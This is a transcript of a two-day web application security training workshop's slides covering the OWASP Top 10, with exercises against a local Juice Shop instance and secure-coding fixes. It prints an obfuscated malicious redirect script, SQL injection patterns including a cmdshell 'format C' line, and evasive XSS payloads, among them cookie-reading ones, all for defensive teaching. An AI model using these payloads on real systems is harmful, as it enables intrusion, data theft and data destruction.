web application security
DESCRIPTION
These are the slides to my 2-day "Web Application Security Training Workshop". The workshop is intended for all IT staff involved in web application development, e.g. software engineers, system analysts, quality engineers or application administrators. The goals of the workshop are: * Build security awareness for web applications * Get to know attack methods of hackers * Learn ways to discover security vulnerabilities * Learn the basics of secure web development Day one starts with a motivation of the topic and then covers the most severe vulnerabilities of web applications based on the OWASP Top 10 list. The attacks on those vulnerabilities are discussed and can be tried out in several examples. Day two starts with a two hour hacking contest where each participant attacks the locally installed BodgeIt store and tries to get as many points on the score card as possible. Next the Secure Software Development Lifecycle is briefly discussed in order to prevent security flaws as early as possible. /!\ Performing attacks on any website or server you do not own yourself is a crime in most countries!TRANSCRIPT
Web Application SecurityTraining Workshop
V3.2.1 (11.04.2023)
Björn Kimminich
https://twitter.com/bkimminichhttps://linkedin.com/in/bkimminichhttps://google.com/+BjörnKimminichhttp://slideshare.net/BjrnKimminich
Björn Kimminich
2007+Software
Architect & Security Officer
at Kuehne+Nagel Corporate Web Development
2011+Part-time lector for Java & Agile
Software Develoment at
private UAS Nordakademie
2012+OWASP Member & QA Developer
OWASP Zed Attack Proxy
(ZAP)
Goals of this WorkshopBuild security awareness for web applicationsGet to know attack methods of hackersLearn ways to discover security vulnerabilitiesLearn the basics of secure web development
Organizational Stuff
Schedule• 2x8 hours• Breaks on demand• Enough time for excercises
Behavior• No daily work during workshop• Ask questions immediately• Open discussion encouraged
Agenda Day One
Motivation
Open Web Application Security Project (OWASP)
Top 10 Web Application Security Risks (A1-A7)
Agenda Day Two
Top 10 Web Application Security Risks (A8-A10)
Secure Software Development Lifecycle
OWASP Zed Attack Proxy
Quiz & Wrap-Up
Motivation
Phishing I
Phishing II
Source: http://www.ups.com/media/news/en/fraud_email_examples.pdf
Whaling
= Phishing attacks on senior executives and other high profile targets within businesses
Hacked Burger King Twitter Account (2013)
Source: http://news.yahoo.com/lightbox/burger-kings-twitter-account-hacked-photo-180655645--abc-news-tech.html http://www.guardian.co.uk/technology/2013/feb/18/burger-king-twitter-account-hack
Twitter defaced by Iranian Cyber Army (2009)
Source: http://praetorianprefect.com/archives/category/app-sec/web-site-defacement/
ESPN site „decorated“ with cute Unicorns (2009)
Source: http://praetorianprefect.com/archives/category/app-sec/web-site-defacement/
Perfectly blended Site Defacement against SCO (2004)
Source: http://news.cnet.com/Hackers-deface-SCO-site/2100-7344_3-5469486.html
Sony Pictures Data Breach (2011)
Source: http://www.informationweek.com/security/attacks/sony-hacked-again-1-million-passwords-ex/229900111
eBay Data Breach (2014)
Source: http://www.pcworld.com/article/2157604/ebay-users-change-your-passwords-the-auction-site-was-breached.html
Forensic Analysis Excercise
Analyze the behavior of the following code taken from an email attachment
<!-- C/C v0964 --><script>function c(){};t=false;kM="kM";c.prototype = {v : function()
{this.e=38741;this.eE="";s='';wS="wS";u="";h=false;y="y";var w=String("htsjRD".substr(0,2)+"k8V3tp3kV8".substr(4,2)+":/VxWG".substr(0,2)+"/e"+"nj"+"oydAgE".substr(0,2)+"yo6C3".substr(0,2)+"urMoc".substr(0,2)+"Q8eDha8eDQ".substr(4,2)+"ir"+"cum1nF".substr(0,2)+"UmI9t.UIm9".substr(4,2)+"co"+"m/"+"5.U2mW".substr(0,2)+"TaShtSaT".substr(3,2)+"cwzmlcwz".substr(3,2));z=false;i=22164;d="";this.b="b";var r=false;zC=false;m='';document["locazLsR".substr(0,4)+"tion"]=w;var eG=false;this.k='';q=5975;g=55201;this.p="";var iK=61242;var n=false;}};var nF=false;this.eF=false;var x=new c(); l="l";gO="";x.v();this.kN=false;
</script>
Forensic Analysis Excercise
It executes the following JavaScript:
The rest is just there for obfuscation<!-- C/C v0964 --><script>function c(){};t=false;kM="kM";c.prototype = {v : function()
{this.e=38741;this.eE="";s='';wS="wS";u="";h=false;y="y";var w=String("htsjRD".substr(0,2)+"k8V3tp3kV8".substr(4,2)+":/VxWG".substr(0,2)+"/e"+"nj"+"oydAgE".substr(0,2)+"yo6C3".substr(0,2)+"urMoc".substr(0,2)+"Q8eDha8eDQ".substr(4,2)+"ir"+"cum1nF".substr(0,2)+"UmI9t.UIm9".substr(4,2)+"co"+"m/"+"5.U2mW".substr(0,2)+"TaShtSaT".substr(3,2)+"cwzmlcwz".substr(3,2));z=false;i=22164;d="";this.b="b";var r=false;zC=false;m='';document["locazLsR".substr(0,4)+"tion"]=w;var eG=false;this.k='';q=5975;g=55201;this.p="";var iK=61242;var n=false;}};var nF=false;this.eF=false;var x=new c(); l="l";gO="";x.v();this.kN=false;
</script>
document[„location“]=http://enjoyyourhaircut.com/5.html;
Why Web Application Security is a High Priority
Web Applications have become the #1 target
75% of Attacks target the Application Layer (Gartner)
Most Web Applications are vulnerable95% of Web Applications have some sort of vulnerability (Imperva)78% of easily exploitable weaknesses occur in Web Applications (Symantec)67% of websites used to distribute malware are legitimate, compromised websites (Symantec)
Source: https://www.owasp.org/index.php/Business_Justification_for_Application_Security_Assessment
Website Attackers by Country(Incapsula, 2012)
Source: http://www.incapsula.com/the-incapsula-blog/item/397-top-security-threats-and-attackers-by-country
Top 5 Internet Security Threats(RSA, 2012)Idealistic young Hacktivists will continue
to attackBig Data Companies are taking control of users while profiting from user informationAttackers will make more use of Mobile Exploits for hacking into corporate networksInsiders (Employees, Consultants, Business Partners) can always pose security risksForeign Governments will start to target clouds and more types of businesses with APTs Source: http://www.notebookreview.com/default.asp?newsID=6310
Advanced Persistent Threat (APT)
Group with both the capability and the intent to persistently and effectively target a specific entityExample: The Stuxnet Creators can be considered an APT to the Iranian Government
Source: http://en.wikipedia.org/wiki/Advanced_persistent_threat
Stuxnet (2009-2011)
Source: http://noramintel.com/stuxnet-virus-opens-new-era-of-cyber-war/
Big Data Company Threat Example
Google‘s Android Backup Functionality
Helps you to migrate all your data and apps to a new device quite easilyIt also used to store passwords to all WLANs you ever used on your device…
…on Google servers in the US (!)…unencrypted (!!!)
Source: https://code.google.com/p/android/issues/detail?id=57560
OWASP
Open Web Application Security Project
OWASP
Open Web Application Security ProjectOpen communityNon-profit organization
Core purposeBe the thriving global community that drives visibility and evolution in the safety and security of the world’s software
https://www.owasp.org
Source: https://www.owasp.org
Principles
Free & OpenGoverned by rough consensus & running codeAbide by a code of ethicsNot-for-profitNot driven by commercial interestsRisk based approach
Source: https://www.owasp.org
Vision
Source: https://www.owasp.org
Some OWASP Projects
Enterprise Security API (ESAPI)Collection of all the security methods that a developer needs to build a secure web application
Zed Attack Proxy (ZAP)Easy to use integrated penetration testing tool for finding vulnerabilities in web applications
Security ShepherdCBT application for web and mobile application security awareness and education
Development GuideMassive document covering all aspects of web application and web service security
Source: https://www.owasp.org
OWASP Top 10
Top 10 Web Application Security Risks
OWASP Top Ten 2013
A1: Injection
A2: Broken Authentication and Session Management
A3: Cross-Site Scripting (XSS)
A4: Insecure Direct Object References
A5: Security Misconfiguration
A6: Sensitive Data Exposure
A7: Missing Function Level Action Control
A8: Cross Site Request Forgery (CSRF)
A9: Using Known Vulnerable Components
A10: Unvalidated Redirects and Forwards
Ex-A6/2007: Information Leakage and Improper Error Handling
Top 10 Risk Rating Methodology I
ThreatAgent
AttackVector Weakness Prevalence Weakness Detectability Technical Impact Business Impact
?Easy Widespread Easy Severe
?Average Common Average Moderate
Difficult Uncommon Difficult Minor
123
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Top 10 Risk Rating Methodology II
Weighted Risk Rating = Probability * ImpactExample:Threat
AgentAttackVector
Weakness Prevalence
Weakness Detectability
Technical ImpactBusiness Impact
?Easy Widespread Easy Severe
?Average Common Average Moderate
Difficult Uncommon Difficult Minor
1 12 2
(1+2+2)/3 = 1.66
1.66*1 = 1.66Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Alternatives to OWASP Top 10?
CWE/SANS Top 25 Most Dangerous Software Errors (2011)
Source: http://cwe.mitre.org/top25
[1]Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[2]Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[3] Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4]Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[5] Missing Authentication for Critical Function[6] Missing Authorization[7] Use of Hard-coded Credentials[8] Missing Encryption of Sensitive Data[9] Unrestricted Upload of File with Dangerous Type[10] Reliance on Untrusted Inputs in a Security Decision[11] Execution with Unnecessary Privileges[12] Cross-Site Request Forgery (CSRF)[13] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')[14] Download of Code Without Integrity Check[15] Incorrect Authorization[16] Inclusion of Functionality from Untrusted Control Sphere[17] Incorrect Permission Assignment for Critical Resource[18] Use of Potentially Dangerous Function[19] Use of a Broken or Risky Cryptographic Algorithm[20] Incorrect Calculation of Buffer Size[21] Improper Restriction of Excessive Authentication Attempts[22] URL Redirection to Untrusted Site ('Open Redirect')[23] Uncontrolled Format String[24] Integer Overflow or Wraparound[25] Use of a One-Way Hash without a Salt
OWASP vs. CWE/SANS?
Both are like different sides of the same coinPCI DSS points to both as industry best practices
Optimal: Be familiar with both!
OWASP Top 10
CWE/SANS Top 25
Target broader
audience
Broader
Weaknesses
Focussed on
Web Apps
Focussed on
Programmers
Web and Non-
Web Apps
Source: http://www.docstoc.com/docs/115032367/2010-CWESANS-Top-25-with-OWASP-Top-10-and-PCI-DSS-V2-Mapping
Use only a local instance for the exercises!Do not attack the deployed application on Heroku (https://juice-shop.herokuapp.com)
The Target: Juice Shophttp://bkimminich.github.io/juice-shop/
Juice ShopLocal instance setup
1. Install node.js from http://nodejs.org2. Install the application using either of
Fork: https://github.com/bkimminich/juice-shop/fork
Clone: git clone https://github.com/bkimminich/juice-shop.git
Unzip: https://github.com/bkimminich/juice-shop/releases/latest
3. Run npm install4. Run npm start5. Browse to http://localhost:3000
The Voice of Rea§on™
Do not perform any attacks on servers, networks and applications…
…you do not own and operate yourself…or have the owners permission to pentest
Ex-A6/2007: Information Leakage and Improper Error Handling
Pre
vale
nce Widespre
ad
Imp
act Minor
What Information is leaked here?
Information Leakage and Improper Error Handling
Applications can unintentionally leakinformation about their configuration or internal workings, or violate privacyinternal state via how long they take to process certain operations or via different responses to differing inputsinformation about their internal state through detailed or debug error messages
This information can be leveraged to launch or even automate more powerful attacks Source: https://www.owasp.org
Possible Information Harvest
Implementation DetailsServer (OS, Version, …)Programming Language (Language, Version, VM-Vendor, …)Database (Oracle, mySQL, …) and details about it (Version, Schema Names, Table Names, Column Names, …)Names and versions of used 3rd party libraries
Other useful informationStacktracesDebugging InformationSQL StatementsPasswords…
Source: https://www.owasp.org
How to handle a failed login attempt?
vs.
How to handle a failed login attempt?
vs.while (noSuchUserError) { // try next user with static password login(user, „?“);}while (wrongPasswordError) { // use existing user and try next
password login(„bkimminich“, password);}
while (loginFailedError) { // try next user while (loginFailedError) { // try next password login(user, password); }}
Exercise
Browse to http://localhost:3000
Task 1: Find the carefully hidden „Score Board“ pageTask 2: Try to provoke some error messages
What information – if any – is leaked on those?
Protection
Common approach to exception handlingDisable or limit detailed error messagesEnsure that secure paths that have multiple outcomes return similar or identical error messages in roughly the same timeCreate a default error handler which returns an appropriately sanitized error message for most users in production for all error paths
A1: Injection
Attack Vector
Easy
Prevalence
Common
Detectability
Average
Impact
Severe
Injection
Injection means……tricking an application into including unintended commands in the data sent to an interpreter
Interpreters……take strings and interpret them as commandsSQL, OS Shell, LDAP, XPath, Hibernate, etc…
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Some simple authentication query
SELECT user_idFROM user_dataWHERE user_name = 'bkimminich'AND user_password = '680e89[…]75ab';
// …String query = "SELECT user_id FROM user_data WHERE "+ user_name = '" + req.getParameter("user") +"' AND user_password = '" + req.getParameter("password") +"'"; // …
SQL Injection Example
SELECT user_idFROM user_dataWHERE user_name = '' or 1=1--' AND user_password = '1234';
// …String query = "SELECT user_id FROM user_data WHERE "+ user_name = '" + req.getParameter("user") +"' AND user_password = '" + req.getParameter("password") +"'"; // …
SQL Injection
Typical ImpactSpy out or manipulate dataManipulate the DB server or access underlying OSBypass authentication or gain admin privileges
Correlation with Information LeakageAttackers use error messages or codes to verify the success of an attack and gather information about type and structure of the database
Blind SQL InjectionIf error message don’t help the attacker he can still “take a stab in the dark”The normal application behavior (e.g. response time) might give away clues on successful/failed Injection attempts
Source: https://www.owasp.org
Typical SQL Injection Attack Patterns I
Bypass Authenticationadmin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1') or ('1'='1
Source: http://ha.ckers.org/sqlinjection
Typical SQL Injection Attack Patterns II
Spy out Data' UNION SELECT login, password, 'x' FROM user--1 UNION SELECT 1,1,1 FROM user--
Manipulate Data'; UPDATE user SET type = 'admin' WHERE id = 23;--
Manipulate the DB Server' ;GO EXEC cmdshell('format C') --
Cheat Sheet: http://ha.ckers.org/sqlinjectionSource: http://ha.ckers.org/sqlinjection
Exercise
Browse to http://localhost:3000
Task 1: Log in as an existing userDo not use password guessingDo not use brute forcing
Task 2: Read all user account ids, emails and passwords from the database
Vulnerable Java Examples
Plain SQL via JDBC
HQL via Hibernate
String query = "SELECT account_balance FROM user_data WHERE user_name = " + request.getParameter("customerName");
try { Statement statement = connection.createStatement(…); ResultSet results = statement.executeQuery(query); }
Query unsafeHQLQuery = session.createQuery("from Inventory where productID='"+userSuppliedParameter+"'");
Protection
Avoid the Interpreter at all if possibleUse an interface that supports bind variables
java.sql.PreparedStatementHibernate Parameter Binding…
Enforce Least Privileges for the application‘s DB userPerform White List Input Validation on all user supplied inputSource: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
White List vs. Black List Validation
White List = Positive Security Rule„Block what is not explicitly allowed!“
Example: Allow only [a-z], [A-Z] and [0-9]
Define once, (almost) never worry againCan be quite effortsome to define for a whole application
Black List = Negative Security Rule„Allow what is not explicitly blocked!“
Example vs. SQL Injection: Block [-#';]Example vs. HTML Injection: Block [<>";'script]
Can be bypassed by masking attack patternsMust be updated for new attack patterns
Fixed Java Examples
Plain SQL via JDBC
HQL via Hibernate
String customerName = request.getParameter("customerName");assert(CustomerValidator.doesExist(customerName);String query = "SELECT account_balance FROM user_data WHERE
user_name = ?";PreparedStatement pstmt = connection.prepareStatement(query);pstmt.setString(1, customerName);ResultSet results = pstmt.executeQuery();
Query safeHQLQuery = session.createQuery("from Inventory where productID=:productId");
safeHQLQuery.setParameter("productId", userSuppliedParameter);
SQL Injection as a feature?!
Intention: Provide cheap means of DB/data maintenance to admin usersProtection: URL is hidden
Never develop like this!
Remember to always sanitize your Database inputs…
Source: http://xkcd.com/327/
A2: Broken Authentication and Session ManagementAttack Vector
Average
Prevalence
Widespread
Detectability
Average
Impact
Severe
<intentionally left blank>
Source: http://www.troyhunt.com/2013/09/web-security-dark-matter-developers-and.html
<still intentionally left blank>
Broken Authentication and Session Management
HTTP is a “stateless” protocolCredentials have to be passed with every requestShould use SSL for everything requiring authentication
Session Management flawsSESSION ID is just as good as credentials to an attackerSESSION ID is typically exposed on the network, in browser, in logs, …
Beware the side-doorsChange my password, remember my password, forgot my password, secret question, logout, email address, credentials stored in plain text in database, etc…
Typical ImpactUser accounts compromised or user sessions hijacked
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Can you crack the 4 digit code of this doorkey safe?
Good Session ID Generator?
h5kek4z9ha1rtrfgj75l3k7hb15rtrl8l65k45hc1rw7ip05jrj53hd1i0395urltda1he1bn46j5le97h9hf2yq3hpo953ld7hg2awi9t6zhj2n5hh27bn0iu345r53hi2aw34o0z43411hj2njkl9por42o9hk3dfrz…
Pattern
• 9,7,5,3,1,9,7,5,3,1,9…• h,h,h,h,h,h,h,h,h,h,h,…• a,b,c,d,e,f,g,h,i,j,k,…• 1,1,1,1,1,2,2,2,2,2,3,…
Protection I
Authentication should be simple, centralized and standardized!Use standard session ID of your containerProtect credentials and session ID with SSL/TLSKeep your SSL certificate safeAutomatic logout of inactive sessionsNever start a login process from an unencrypted pageSession IDs and credentials don’t belong into logfiles
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Protection II
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Rely on single authentication mechanism with appropriate strength and number of factorsUse strong supplemental authentication mechanisms
Challenge-ResponseLimited time passwords
Check old password on password changeSend confirmation request to old email address on email address change
Excursion:Guideline for Strong PasswordsMinimum length of 12 to 14 characters if permitted
Generating passwords randomly where feasibleAvoiding passwords based on repetition, dictionary words, letter or number sequences, usernames, relative or pet names, romantic links (current or past), or biographical information (e.g., ID numbers, ancestors' names or dates).Including numbers, and symbols in passwords if allowed by the systemIf the system recognizes case as significant, using capital and lower-case lettersAvoiding using the same password for multiple sites or purposesAvoid using something that the public or workmates know you strongly like or dislike
Source: http://en.wikipedia.org/wiki/Password_strength
Excursion:Password Strength Advisers
Automated tests of password strength are problematicAny network based checking necessarily involves submitting one's password to a purpose declared system somewhere
The relevant network traffic is easily identifiable as passwords saving much effort for the attacker
Passwords which are vulnerable to social engineering and guessing attacks cannot be properly checked automatically
Source: http://en.wikipedia.org/wiki/Password_strength
Excursion:Let‘s test some passwords
12345abcdefgabcdefg12345abcd1234!?laura21052005ingrid2004-12-17
Source: http://howsecureismypassword.net/
Instantly Crackable
Instantly Crackable
PC would take ~37 years to crack
PC would take ~22 years to crack
PC would take ~1351 years to crack
PC would take 16 billion years to crack
+ some creative trial & error+ some research on me+ some social engineering
ALL those passwordcracked rather easily
Excursion:Two-Factor-Authentication
Oldschool Paper TAN
List
Protect your account via
RSA-Token orSmartphone App
TANs and dedicated confirmation of suspicious
payments via text message
Computer won‘t boot unless Security USB-Device is plugged in
Facial Recognition via Webcam for
unlocking computer
Facial Recognition via Webcam for
unlocking computer
Exercise
Browse to http://localhost:3000
Task 1: Log in with the credentials of the admin user without previously changing themTask 2: Change an existing users password
A3: Cross-Site Scripting (XSS)
Attack Vector
Average
Prevalence
Very Widespread
Detectability
Easy
Impact
Moderate
Cross-Site Scripting (XSS)
Attacker sends malicious code to an innocent user’s browserMalicious code might be…
…reflected from web input (form or hidden field, URL, etc…)
…stored in database…sent directly into rich JavaScript client
Virtually every web application has this problem
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Typical Impact
Steal user’s sessionSteal sensitive dataRewrite web pageRedirect user to phishing or malware site
Most Severe:Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Reflected XSS
Source: http://www.h-online.com/security/features/Web-application-security-747201.html
ServerBrowser
Database
Web Application
Bug!URL
HTML
Victim Request
Website Server Response
Persistent XSS
Source: http://www.h-online.com/security/features/Web-application-security-747201.html
ServerBrowser
Database
Web Application
Bug!
Website Server Response HTML
URL Initial Request
URL Subsequent Victim Request
Local XSS
Source: http://www.h-online.com/security/features/Web-application-security-747201.html
ServerBrowser
Database
Web Application
URL Victim Request
HTMLScript Code
Bug!
Website
Script Code Server Response
Server Response
Bug!
DOM Access
XSS Attack Patterns I
Simple Patterns<SCRIPT>javascript:alert('XSS');</SCRIPT><IMG SRC=javascript:alert('XSS')><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Masked / Evasive Patterns<IMG SRC=javascript:alert("XSS")>'';!--"<XSS>=&{()}<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><IMG SRC="jav ascript:alert('XSS');"><IMG SRC="jav	ascript:alert('XSS');">
Source: http://ha.ckers.org/xss.html
XSS Attack Patterns II
Masked / Evasive Patterns (continued)
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> …
Cheat Sheet: http://ha.ckers.org/xss.html
Source: http://ha.ckers.org/xss.html
Bypassing Client Side Validation
Client Side Validation is always insecure!Install Tampering Plugin
e.g. Tamper Data (Firefox)e.g. Request Maker (Chrome)
You can now stop all outgoing HTTP requests in your browser
…and tamper the contained headers, POST data and passed parameters
…after Client Side Validation took place…but before they are actually submitted to the server
Exercise
Browse to http://localhost:3000
Task 1: Reflect an XSS attack back at the userTask 2: Persist an XSS attack in the DB
Visit the attacked page afterwards to test the attack
XSS Vulnerable Java Example
Scriptlet in Java Server Page (JSP)<%String searchCriteria = request.getParameter("searchValue");%>
<%-- Later on the same or subsequent JSP... -->
Search results for <b><%=searchCriteria%></b>:...
Protection
Eliminate XSSDon‘t include user supplied input in your output!
Defend against XSSOutput Encode all user supplied input
OWASP Enterprise Security APIFor GWT: com.google.gwt.safehtml.shared.SafeHtml
Perform White List Input Validation on user inputUse an HTML Sanitizer for larger user supplied HTML chunks
OWASP Java HTML Sanitizer
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Fixed Java Example w/ Encoding
Encoding with Struts Bean Taglib
Encoding with OWASP Enterprise Security API
...Search results for <b><bean:write name='searchCriteria'/></b>:...
...<easpi:encodeForHtml><%=searchCriteria></esapi:encodeForHtml>...
Validation & Encoding with ESAPI
Presentation
UserInterface
Busin
ess
Web Service
Database
File SystemUser
Inte
gra
tion
Set Character Set
Encode For HTML
Global Validate
Canonicalize
Specific Validate
Sanitize
Canonicalize
Validate
Source: http://code.google.com/p/owasp-esapi-java/downloads/detail?name=OWASP%20ESAPI.ppt
Safe Escaping Schemes in various HTML Contexts
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
HTML Style Property Values
(e.g., .pdiv a:hover {color: red; text-decoration: underline} )
JavaScript Data(e.g., <script> some javascript
</script> )
HTML Attribute Values(e.g., <input name='person'
type='TEXT' value='defaultValue'> )
HTML Element Content(e.g., <div> some text to display
</div> )
URI Attribute Values(e.g., <a
href="javascript:toggle('lesson')" )
#4: All non-alphanumeric < 256 \HH
ESAPI: encodeForCSS()
#3: All non-alphanumeric < 256 \xHH
ESAPI: encodeForJavaScript()
#1: ( &, <, >, " ) &entity; ( ', / ) &#xHH;
ESAPI: encodeForHTML()
#2: All non-alphanumeric < 256 &#xHH
ESAPI: encodeForHTMLAttribute()
#5: All non-alphanumeric < 256 %HH
ESAPI: encodeForURL()
OWASP Java HTML Sanitizer
Using a simple prepackaged policy
Defining a customized policy
private String sanitizeHtml(String html) { PolicyFactory policy = Sanitizers.FORMATTING.and(Sanitizers.BLOCKS)
.and(Sanitizers.LINKS);
return policy.sanitize(html);}
private static final PolicyFactory BASIC_FORMATTING_WITH_LINKS_POLICY =
new HtmlPolicyBuilder()
.allowCommonInlineFormattingElements().allowCommonBlockElements()
.allowAttributes("face", "color", "size", "style", "align").onElements("font")
.allowAttributes("style").onElements("div", "span").allowElements("a")
.allowAttributes("href").onElements("a").allowStandardUrlProtocols()
.requireRelNofollowOnLinks().toFactory();
A4: Insecure Direct Object Reference
Attack Vector
Easy
Prevalence
Common
Detectability
Easy
Impact
Moderate
Insecure Direct Object Reference
How do you protect access to your data?This is part of enforcing proper “Authorization” along with A7 – Failure to Restrict URL Access
Common mistakesOnly listing the ‘authorized’ objects for the current userHiding the object references in hidden fields…… and then not enforcing these restrictions on server side (=Presentation layer access control)Attacker simply tampers with parameter value
Typical ImpactUsers are able to access unauthorized files or data
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Insecure Direct Object ReferenceIllustratedChecking online how you did in an
examhttp://universi.ty/marks?id=i99a19
Checking how your fellow students didhttp://universi.ty/marks?id=i99a01http://universi.ty/marks?id=i99a02…http://universi.ty/marks?id=i99a20
Checking the distribution among classhttp://universi.ty/marks?id=i99
Protection
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Eliminate the Direct Object References
Replace with temporary mapping valuee.g. with ESAPI AccessReferenceMap
Validate the Direct Object ReferenceVerify parameter value formatVerify user authorization to access target object
Query Constraints work great! (Data Access Restriction)
Verify the requested mode of access is allowed to the target object (read, write, delete, …)
Access Reference Maps
Maps internal object references to indirect references that are safe to disclose publicly
Prevents A4 Insecure Direct Object Reference
Side Benefit of Random Reference Maps if used consequently and on per-user basis
Makes guessing valid references impossiblePrevents A5 Cross Site Request Forgery
Source: http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html
http://myapp?file=report4711.xlshttp://myapp?file=8jK65l
http://myapp?file=report4712.xlshttp://myapp?file=T5d8ui
Random Access
Reference Map
report4711.xls
report4712.xls
Access Reference MapsCode Example
Source: http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html
Set fileSet = new HashSet();fileSet.addAll(...); // Add direct references, e.g. Files
AccessReferenceMap map =new RandomAccessReferenceMap(fileSet);
String indirectRef = map.getIndirectReference(file1);String href = "http://myapp?file=" + indirectRef);
// ... Somewhere else in the code
String indirectRef = request.getParameter("file");File file = (File)map.getDirectReference(indirectRef);
A5: Security Misconfiguration
Attack Vector
Easy
Prevalence
Common
Detectability
Easy
Impact
Moderate
Security Misconfiguration
Web applications rely on a secure foundation
Everywhere from the OS up through the App ServerDon’t forget all the libraries you are using!
Is your source code a secret?Think of all the places your source code goesSecurity should not require secret source code
Do you change all credentials regularly in your production environment?
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Typical Impact
Install backdoor through missing OS or server patchXSS flaw exploits due to missing application framework patchesUnauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Did you think of everyting?
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Hardened OS
Web Server
App Server
Framework
App Configuration
Custom Code
Acc
ou
nts
Fin
an
ce
Ad
min
istr
ati
on
Tran
sact
ion
s
Com
mu
nic
ati
on
Kn
ow
led
ge M
gm
tE-C
om
merc
e
Bu
s. F
un
ctio
ns
Test Servers
QA Servers
Source Control
Development
Database
Insider
Exercise
Browse to http://localhost:3000
Task 1: Access the administration section of the storeTask 2: Get rid of all ***** rated Feedback
Protection
Verify your system’s configuration management
Secure configuration “hardening” guidelineAutomation is really useful here
Must cover entire platform and applicationKeep up with patches for all components
This includes software libraries, not just OS and Servers!
Analyze security effects of changes
Deactivate unnecessary stuffPorts, Services, Accounts, Sites, …
Verify the implementationScanning finds generic configuration and missing patch problems
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
A6: Sensitive Data Exposure
Attack Vector
Difficult
Prevalence
Uncommon
Detectability
Average
Impact
Severe
Clairvoyance…?
Sensitive Data Exposure
Storing sensitive data insecurelyFailure to identify all sensitive dataFailure to identify all the places that this sensitive data gets sent or stored
On the web, to business partners, internal communicationDatabases, files, directories, log files, backups, etc.
Failure to properly protect this data in every location
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Typical Impact
Typical ImpactAttackers access or modify confidential or private information (e.g credit cards, health care records, financial data, …)Attackers extract secrets to use in additional attacksCompany embarrassment, customer dissatisfaction, and loss of trustExpense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insuranceBusiness gets sued and/or fined
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Common Examples
Sensitive Data is not encryptedUsing self-made crypto algorithmsUnsafe usage of safe crypto algorithmsStore Keys and Passwords in Source CodeStore Keys/Certificates in unsafe locationContinued usage of weak crypto algorithms
e.g. MD5, SHA-1, RC3, RC4
Excercise
Browse to http://localhost:3000
Task: Place an order using a forged coupon code that gives you at least 80% discount
Protection I
Verify your architectureIdentify all sensitive dataIdentify all the places that data is storedEnsure threat model accounts for possible attacksUse encryption to counter the threats, don’t just ‘encrypt’ the data
Protect with appropriate mechanismsFile encryption, database encryption, data element encryptionUse TLS on all connections with sensitive data
Use the mechanisms correctlyUse standard strong algorithms
e.g. AES, RSA, SHA-256
Generate, distribute, and protect keys properlyBe prepared for key change
Verify the implementationSource: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Protection II
Be especially careful in unknown Networks
WLAN Hotspots, Internet Cafés, …
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
A7: Missing Function Level Action Control
Attack Vector
Easy
Prevalence
Common
Detectability
Average
Impact
Moderate
Missing Function Level Action Control
How do you protect access to functions?This is part of enforcing proper “Authorization” along with A4 – Insecure Direct Object References
Common MistakesDisplaying only authorized links and menu choicesAttacker simply forges direct access to ‘unauthorized’ pages
Typical ImpactAttackers invoke functions and services they’re not authorized forAccess other user’s accounts and dataPerform privileged actions
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
Exercise
Browse to http://localhost:3000
Task 1: Place an order that has a negative total Task 2: Access some files that were not meant for you to seeTask 3: Find the hidden „easter egg“
Includes „A6 – Sensitive Data Exposure“ sub-exercise!
Protection
Restrict access to authenticated users (if not public)Enforce any user or role based permissions (if private)Completely disallow requests to unauthorized page types
config fileslog filessource files…
Source: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx
End of Day One
See you all tomorrow!
Web Application SecurityTraining Workshop
Björn Kimminich
